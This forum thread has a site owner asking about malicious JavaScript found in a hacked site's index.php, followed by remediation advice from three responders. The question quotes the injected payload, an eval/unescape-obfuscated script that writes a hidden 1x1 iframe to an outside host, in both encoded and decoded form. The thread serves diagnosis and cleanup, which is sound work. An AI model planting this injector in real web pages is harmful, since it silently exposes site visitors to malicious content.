Need help identifying malicious JavaScript code that was placed on my hacked website

Question

Hi

index.php file of my website has been affected by a script which is given below. because of this, google has been banned me from accessing. somebody please tell me wat kind of attack is this and is there any solution.

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%30%36%36%37%31%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

FWIW, the unencoded version of the above is

eval(document.write('<iframe src="http://podfer.com/?5066718" width=1 height=1></iframe>'));

thanks and regards

tismon

Answer 1

Sounds like this: link text

From the limited information you posted, I can almost guarantee that you're running some sort of open-source software on that site--Maybe not on the exact site that's affected, but there's probably some on the server....and it's also not likely patched up to current standards. I've seen it happen with phpBB, Joomla (especially Joomla) phpMyAdmin, and Wordpress. It's almost scary common and 99% of the time is nowhere near as sophisticated as many think it might be. It happened to me on a very old test install of Mambo and at work with a rogue install of phpBB that someone on the IT staff snuck on the server to communicate with their fantasy football league.

Thing is, hackers are lazy. Unless you've got something they really want, there's no reason for them to go and hack you individually...it's not worth their time. However, if you're running a common piece of code with an exploitable codebase, they can scan sites for it at random, and when they find the hole, attack automatically. Hence the reason the code will be identical in content and location nearly all the time.

Park the site...put up a "under construction" page. Pull your code down and scrub it, whether by hand or automated. Now stop! Update all open source code, no matter how recent it might be. Now do sanity checks on permissions, SQL queries (especially search boxes that aren't escaped) and user permission systems. Run Script injection tests. Finally, once it's all cleared to the best of your ability, test, test, test. Finally, thought it likely had little to do with the problem, change your password and use a good password strategy to protect it.

Good luck. Be careful!

Answer 2

What bpeterson76 said, but also:

If it is true that you're not running any common software on your system, I'd first check your own scripts, especially if you're doing any writing to the filesystem anywhere. But it might also be outdated server software like apache or what have you which exposes a security hole. It's not likely to be SQL-injection as data has been added to your files.

Depending on your hosting, either update all your server software, or ask your hosting provider.

Do you have any logs? A good look at them might reveal the hole. If you're on shared hosting, on some setups other customers can write to your files if your file permissions are to permissive.

Answer 3

I actually had a similar attack on my sites not too long ago. First off, check the folders under your web root for php files named after functions. Mine were opendir, iswritable etc. You should see more base64 encoded script in those files. If you don't, it may be unrelated. In any case, the who.is record for podfer.com has some info on it. Contact the hosting company of that website and tell them it's launching CSS attacks, they should shut him down without too much trouble. I got the hacker that effed with me that way.

Also, if you are using Mosso/rackspace, you should go in and tighten up your file permissions.